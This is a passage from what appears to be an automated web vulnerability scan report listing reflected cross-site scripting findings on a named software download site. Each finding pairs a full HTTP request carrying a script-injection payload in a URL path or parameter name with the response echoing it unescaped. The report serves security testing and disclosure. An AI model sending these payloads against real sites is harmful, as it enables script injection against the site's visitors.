HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:37:59 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:48:29 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 31428
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html568b0"><script>alert(1)</script>8a53e952c4" /> ...[SNIP]...
1.81. http://www.x64bitdownload.com/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdf61"><script>alert(1)</script>fa8586d080a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-newsgroups-c-44-newsgroup-clients-downloads.html?bdf61"><script>alert(1)</script>fa8586d080a=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:35:42 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:45:43 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 31432
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html?bdf61"><script>alert(1)</script>fa8586d080a=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3ac5"><script>alert(1)</script>c5960a7fdd6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-newsgroups-downloads.htmlf3ac5"><script>alert(1)</script>c5960a7fdd6 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:57:27 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:07:57 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 88674
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-newsgroups-downloads.htmlf3ac5"><script>alert(1)</script>c5960a7fdd6" /> ...[SNIP]...
1.83. http://www.x64bitdownload.com/64-bit-newsgroups-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-newsgroups-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff596"><script>alert(1)</script>281d8a3753f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-newsgroups-downloads.html?ff596"><script>alert(1)</script>281d8a3753f=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:53:18 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:03:18 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 88677
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-newsgroups-downloads.html?ff596"><script>alert(1)</script>281d8a3753f=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b459f"><script>alert(1)</script>c9490a838b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-newsreader-c-44-newsgroup-clients-downloads.htmlb459f"><script>alert(1)</script>c9490a838b3 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:38:39 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:48:56 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 32617
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-newsreader-c-44-newsgroup-clients-downloads.htmlb459f"><script>alert(1)</script>c9490a838b3" /> ...[SNIP]...
1.85. http://www.x64bitdownload.com/64-bit-newsreader-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47e63"><script>alert(1)</script>0dbe9fe771e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-newsreader-c-44-newsgroup-clients-downloads.html?47e63"><script>alert(1)</script>0dbe9fe771e=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:35:38 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:45:50 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 32620
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-newsreader-c-44-newsgroup-clients-downloads.html?47e63"><script>alert(1)</script>0dbe9fe771e=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f09b"><script>alert(1)</script>50aa1ce8d40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-newsreader-downloads.html7f09b"><script>alert(1)</script>50aa1ce8d40 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:39:58 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:50:31 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 55959
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-newsreader-downloads.html7f09b"><script>alert(1)</script>50aa1ce8d40" /> ...[SNIP]...
1.87. http://www.x64bitdownload.com/64-bit-newsreader-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-newsreader-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dea4d"><script>alert(1)</script>a510634e8be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-newsreader-downloads.html?dea4d"><script>alert(1)</script>a510634e8be=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:37:05 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:47:05 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 55962
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-newsreader-downloads.html?dea4d"><script>alert(1)</script>a510634e8be=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca996"><script>alert(1)</script>a4a17688857 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-nntp-c-44-newsgroup-clients-downloads.htmlca996"><script>alert(1)</script>a4a17688857 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:38:25 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:48:26 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 31857
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-nntp-c-44-newsgroup-clients-downloads.htmlca996"><script>alert(1)</script>a4a17688857" /> ...[SNIP]...
1.89. http://www.x64bitdownload.com/64-bit-nntp-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea43c"><script>alert(1)</script>1d1fba47ba5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-nntp-c-44-newsgroup-clients-downloads.html?ea43c"><script>alert(1)</script>1d1fba47ba5=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:35:37 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:45:49 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 31860
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-nntp-c-44-newsgroup-clients-downloads.html?ea43c"><script>alert(1)</script>1d1fba47ba5=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83928"><script>alert(1)</script>a5b455172b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-nntp-downloads.html83928"><script>alert(1)</script>a5b455172b2 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:44:37 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:54:40 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 87761
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-nntp-downloads.html83928"><script>alert(1)</script>a5b455172b2" /> ...[SNIP]...
1.91. http://www.x64bitdownload.com/64-bit-nntp-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-nntp-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9892e"><script>alert(1)</script>5d9734d7e08 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-nntp-downloads.html?9892e"><script>alert(1)</script>5d9734d7e08=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:41:44 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:51:54 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 87764
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-nntp-downloads.html?9892e"><script>alert(1)</script>5d9734d7e08=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 430b8"><script>alert(1)</script>a87f0fbe7d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-nzb-downloads.html430b8"><script>alert(1)</script>a87f0fbe7d8 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:58:21 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:08:35 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 60699
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-nzb-downloads.html430b8"><script>alert(1)</script>a87f0fbe7d8" /> ...[SNIP]...
1.93. http://www.x64bitdownload.com/64-bit-nzb-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-nzb-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad6ec"><script>alert(1)</script>984fa8fe340 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-nzb-downloads.html?ad6ec"><script>alert(1)</script>984fa8fe340=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:54:20 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 16:04:43 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 60702
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-nzb-downloads.html?ad6ec"><script>alert(1)</script>984fa8fe340=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbdb3"><script>alert(1)</script>4b97b90929 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-ozum-downloads.htmlfbdb3"><script>alert(1)</script>4b97b90929 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:39:39 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:49:50 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29406
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-ozum-downloads.htmlfbdb3"><script>alert(1)</script>4b97b90929" /> ...[SNIP]...
1.95. http://www.x64bitdownload.com/64-bit-ozum-downloads.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.x64bitdownload.com
Path:
/64-bit-ozum-downloads.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98bd1"><script>alert(1)</script>f6291253f5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-ozum-downloads.html?98bd1"><script>alert(1)</script>f6291253f5c=1 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
HTTP/1.1 200 OK Date: Mon, 24 Jan 2011 15:36:15 GMT Server: Apache/2.2.9 (Fedora) Expires: Mon, 24 Jan 2011 15:46:21 GMT Cache-Control: max-age=600 Pragma: cache Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/ Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29410
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content ...[SNIP]... <input type="hidden" name="retpage" value="/64-bit-ozum-downloads.html?98bd1"><script>alert(1)</script>f6291253f5c=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0759"><script>alert(1)</script>6fd3ce475e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /64-bit-par-downloads.htmld0759"><script>alert(1)</script>6fd3ce475e7 HTTP/1.1 Host: www.x64bitdownload.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;
Response
